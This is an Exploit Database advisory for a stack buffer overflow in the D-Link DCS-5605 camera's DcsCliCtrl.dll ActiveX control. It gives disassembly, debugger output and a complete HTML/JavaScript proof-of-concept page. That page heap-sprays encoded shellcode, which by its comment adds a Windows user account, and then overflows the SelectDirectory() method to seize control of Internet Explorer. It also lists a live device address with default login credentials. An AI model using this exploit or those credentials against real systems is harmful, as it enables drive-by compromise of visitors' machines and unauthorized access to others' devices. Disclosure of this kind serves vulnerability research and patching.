D-Link DCS-5605 Network Surveillance – ActiveX Control ‘DcsCliCtrl.dll’ lstrcpyW Remote Buffer Overflow

• Exploit Database
• 12 阅读

• 作者： rgod
  日期： 2012-03-28
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/18673/

• D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control 
  DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
  
  tested against: Microsoft Windows Server 2003 r2 sp2
  Internet Explorer 7/8
  
  Live demo: http://203.125.227.70/eng/index.cgi
  username: dlink
  password: dlink
  
  product homepage: http://www.d-link.com/products/?pid=771
  
  product description:
  "The DCS-5605 is a high performance camera for professional surveillance 
  and remote monitoring. This network camera features motorized pan, 
  tilt, and optical/digital zoom for ultimate versatility. The 10x optical 
  zoom lens delivers the level of detail necessary to identify faces, license 
  plate numbers, and other important details that are difficult to 
  clearly distinguish using digital zoom alone"
  
  background:
  When browsing the device web interface, the user
  is asked to install an ActiveX control to stream
  video content. This control has the following settings:
  
  Description: Camera Stream Client Control
  File version: 1.0.0.4519
  Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
  ProgID: DcsCliCtrl.DCSStrmControl.1
  GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
  Implements IObjectSafety: Yes
  Safe For Scripting (IObjectSafety): True
  Safe For Initialization (IObjectSafety): True
  
  
  Vulnerability:
  the ActiveX control exposes the SelectDirectory()
  method which supports one optional argument.
  See typelib:
  ...
  /* DISPID=22 */
  	/* VT_BSTR [8] */
  	function SelectDirectory(
  		/* VT_VARIANT [12] [in] */ $varDefPath 
  		)
  	{
  		/* method SelectDirectory */
  	}
  ...
  
  This method suffers of a stack based buffer overflow vulnerability
  because an unsafe lstrcpyW() call inside DcsCliCtrl.dll:
  
  
  ...
  100712E0 81EC 34040000sub esp,434
  100712E6 A1 2C841010mov eax,dword ptr ds:[1010842C]
  100712EB 33C4 xor eax,esp
  100712ED 898424 30040000mov dword ptr ss:[esp+430],eax
  100712F4 53 push ebx
  100712F5 8B9C24 48040000mov ebx,dword ptr ss:[esp+448]
  100712FC 55 push ebp
  100712FD 8BAC24 40040000mov ebp,dword ptr ss:[esp+440]
  10071304 56 push esi
  10071305 8BB424 4C040000mov esi,dword ptr ss:[esp+44C]
  1007130C 57 push edi
  1007130D 8BBC24 4C040000mov edi,dword ptr ss:[esp+44C]
  10071314 68 08020000push 208
  10071319 8D4424 34lea eax,dword ptr ss:[esp+34]
  1007131D 6A 00push 0
  1007131F 50 push eax
  10071320 E8 0BC40300call DcsCliCt.100AD730
  10071325 83C4 0Cadd esp,0C
  10071328 85F6 test esi,esi
  1007132A 74 0Cje short DcsCliCt.10071338
  1007132C 56 push esi
  1007132D 8D4C24 34lea ecx,dword ptr ss:[esp+34]
  10071331 51 push ecx
  10071332 FF15 D4D20C10call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <-------------
  ...
  
  An attacker could entice a remote user to browse a web
  page to gain control of the victim browser, by passing an overlong string to 
  the mentioned method and overwriting critical structures (SEH).
  
  As attachment proof of concept code.
  
  Note, to reproduce the wanted crash: 
  when the SelectDirectory() method is called the
  user is asked to select a destination folder for the stream recorder.
  To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
  When clicking Cancel you have an unuseful crash, however it could be
  possible that modifying the poc you will have EIP overwritten aswell.
  
  
  I think that it is also possible that other products might carry this dll,
  I could post an update if I find more.
  
  Additional note:
  
  0:029> lm -vm DcsCliCtrl
  startendmodule name
  08450000 0859e000 DcsCliCtrl (deferred) 
  Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
  Image name: DcsCliCtrl.dll
  Timestamp:Thu Aug 19 08:48:47 2010 (4C6CD3CF)
  CheckSum: 001325EC
  ImageSize:0014E000
  File version: 1.0.0.4519
  Product version:1.0.0.1
  File flags: 0 (Mask 3F)
  File OS:4 Unknown Win32
  File type:2.0 Dll
  File date:00000000.00000000
  Translations: 0409.04e4
  ProductName:Camera Streaming Client
  InternalName: DcsCliCtrl.dll
  OriginalFilename: DcsCliCtrl.dll
  ProductVersion: 1.0.0.1
  FileVersion:1.0.0.4519
  FileDescription:Camera Stream Client Control
  LegalCopyright: Copyright: (c) All rights reserved.
  
  
  
  
  <!-- 
  D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll 
  lstrcpyW Remote Buffer Overflow Vulnerability poc
  (ie7)
  
  Description: Camera Stream Client Control
  File version: 1.0.0.4519
  Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
  ProgID: DcsCliCtrl.DCSStrmControl.1
  GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
  Implements IObjectSafety: Yes
  Safe For Scripting (IObjectSafety): True
  Safe For Initialization (IObjectSafety): True
  
  rgod
  -->
  <!-- saved from url=(0014)about:internet -->
  <html>
  please select a directory to download ...
  <object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0 />
  </object>
  <script language='javascript'>
  //add user one, user "sun" pass "tzu"
  shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
  "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
  "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
  "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
  "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
  "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
  "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
  "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
  "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
  "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
  "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
  "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
  "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
  "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
  "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
  "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
  "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
  "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
  "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
  "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
  "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
  "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
  "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
  "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
  "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
  "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
  "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
  "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
  "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
  "%u7734%u4734%u4570");
  bigblock = unescape("%u0c0c%u0c0c");
  headersize = 20;
  slackspace = headersize+shellcode.length;
  while (bigblock.length<slackspace) bigblock+=bigblock;
  fillblock = bigblock.substring(0, slackspace);
  block = bigblock.substring(0, bigblock.length-slackspace);
  while(block.length+slackspace<0x40000) block = block+block+fillblock;
  memory = new Array();
  for (i=0;i<666;i++){memory[i] = block+shellcode}
  </script>
  <script defer=defer>
  var x = "";
  for (i=0; i<200; i++){
  x = x + unescape("%u4141%u4141");
  }
  for (i=0; i<700; i++){
  x = x + unescape("%u0c0c%u0c0c");
  }
  obj.SelectDirectory(x);
  </script>